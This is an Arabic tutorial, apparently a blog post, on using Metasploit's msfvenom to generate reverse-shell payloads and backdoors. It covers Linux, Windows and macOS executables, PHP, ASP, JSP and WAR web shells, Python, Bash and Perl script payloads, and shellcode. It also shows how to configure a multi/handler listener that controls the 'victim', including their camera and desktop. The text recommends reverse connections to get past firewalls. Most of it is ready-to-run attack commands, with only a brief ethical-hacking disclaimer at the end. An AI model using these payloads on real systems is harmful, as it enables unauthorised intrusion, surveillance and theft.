أهم مشروع موجود بنظام الكالي لينكس هو مشروع الميتاسبلويت, والذي يفيدنا بعدة أغراض منها انشاء بايلود والتحكم به بعد اختراق الضحية, وارسال تعليمات مثل التحكم في الكاميرا وتسجيل لقطات من على سطح مكتب الضحية أو من هاتفه وغيرها من الأوامر, في هذا المقال سنتعرف على أهم خطوة وهي طريقة تكوين بايلود ومن لا يعرف البايلود يمكن تشبيهه بالسيرفر في برامج الرات والذي يسمى تروجان Trojan أو باكدور Backdoor.
في مشروع الميتاسبلويت كانت هناك أداة في السابق تسمى MsfPayload منخلالها كنا نقوم بصنع البايلود, اما في النسخ الحديثة قاموا بتغييرها الى أداة msfvenom والتي سنستخدمها في شرحنا موضحة كما في الصورة.
في التعليمات التي سنسردها أسفله تحتاج لضبط بعض التعليمات على حسب احتياجاتك ومتطلبات الثغرة على سبيل المثال:
قد يهمك أيضا:
في مشروع الميتاسبلويت كانت هناك أداة في السابق تسمى MsfPayload منخلالها كنا نقوم بصنع البايلود, اما في النسخ الحديثة قاموا بتغييرها الى أداة msfvenom والتي سنستخدمها في شرحنا موضحة كما في الصورة.
في التعليمات التي سنسردها أسفله تحتاج لضبط بعض التعليمات على حسب احتياجاتك ومتطلبات الثغرة على سبيل المثال:
- تضع مكان LPORT البورت المفتوح في جهازك (مثلا: 88,4444,443) والذي ستتصل عبره مع الضحية, وهو اختصار ل Local Port
- تضع مكان LHost الاي بي الخاص بك, اذا كنت تخترق داخل الشبكة تستعمل الاي بي الداخلي شكله 192.168.1.3 وان كنت تخترق في جهاز خارج الشبكة أي بعيد عنك تدخل الاي بي الخارجي ومن الأفضل النو اي بي No-ip
- في حالات أخرى تجد RHost وهي تعني اي بي الضحية RemoteHost لم نتظرق لها في هذا الشرح.
- عند تعويض التعليمات باعداداتك لا تكتب الرموز الاتي < > مع الاوامر فهي لغرض التوضيح فقط.
- في البايلودات استعملت البايلود العكسي reverse_tcp وهو الأفضل لأنه عندما يشتغل في جهاز الضحية هو من سيتصل بجهازك وبهذا ستتخطى مشكل الجدار الناري. على عكس البايلود bind_tcp وغيره.
لاظهار جميع البايلودات المتوفرة في الميتاسبلويت
msfvenom -l
طريقة تكوين بايلود تنفيذي على أنظمة مختلفة
تكوين بايلود يخترق لينكس
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=LPORT= -f elf > shell.elf
تكوين بايلود يخترق ويندوز
msfvenom -p windows/meterpreter/reverse_tcp LHOST=LPORT= -f exe > shell.exe
صورة بعد تطبيق الأمر
حجم الباكدور الناتج 73 كيلوبايت بدون تشفير
تكوين بايلود يخترق ماكنتوش
msfvenom -p osx/x86/shell_reverse_tcp LHOST=LPORT= -f macho > shell.macho
طريقة تكوين بايلود الويب Web Payloads
تكوين بايلود يخترق السيرفرات بصيغة بلغة php
msfvenom -p php/meterpreter_reverse_tcp LHOST=LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php
تكوين بايلود يخترق السيرفرات بصيغة بلغة asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=LPORT= -f asp > shell.asp
تكوين بايلود يخترق السيرفرات بصيغة بلغة jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=LPORT= -f raw > shell.jsp
تكوين بايلود يخترق السيرفرات بصيغة بلغة war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=LPORT= -f war > shell.war
طريقة تكوين سكربت بايلود Scripting Payloads
تكوين بايلود بلغة بايثون
Python
msfvenom -p cmd/unix/reverse_python LHOST=LPORT= -f raw > shell.py
تكوين بايلود بلغة باش
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=LPORT= -f raw > shell.sh
تكوين بايلود بلغة بيرل
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=LPORT= -f raw > shell.pl
طريقة تكوين شيل كود لدمجه في اكسبلويت exploits
بالنسبة لاظهار جميع تعليمات الشيل كود الصالحة، ادخل الأمر الأتي في الطرفية
msfvenom --help-format
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=LPORT= -f
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=LPORT= -f
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=LPORT= -f
اعداد المتحكم أو مقبض البايلود Handlers
للتحكم في البايلود بعد اختراق الضحية وجب عليك فتح مشروع الميتاسبلويت بالامر
msfconsoleثم قم بادخال اتعلييمات الأتية:
use exploit/multi/handler
set PAYLOAD
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z
تنويه: هذه المعلومات لأغراض تعليمية فقط، وخدمة للهكر الأخلاقي، وليست بغرض مهاجمة الأنظمة التي لا تملك لها إذن وصول، وما إلى ذلك
قد يهمك أيضا: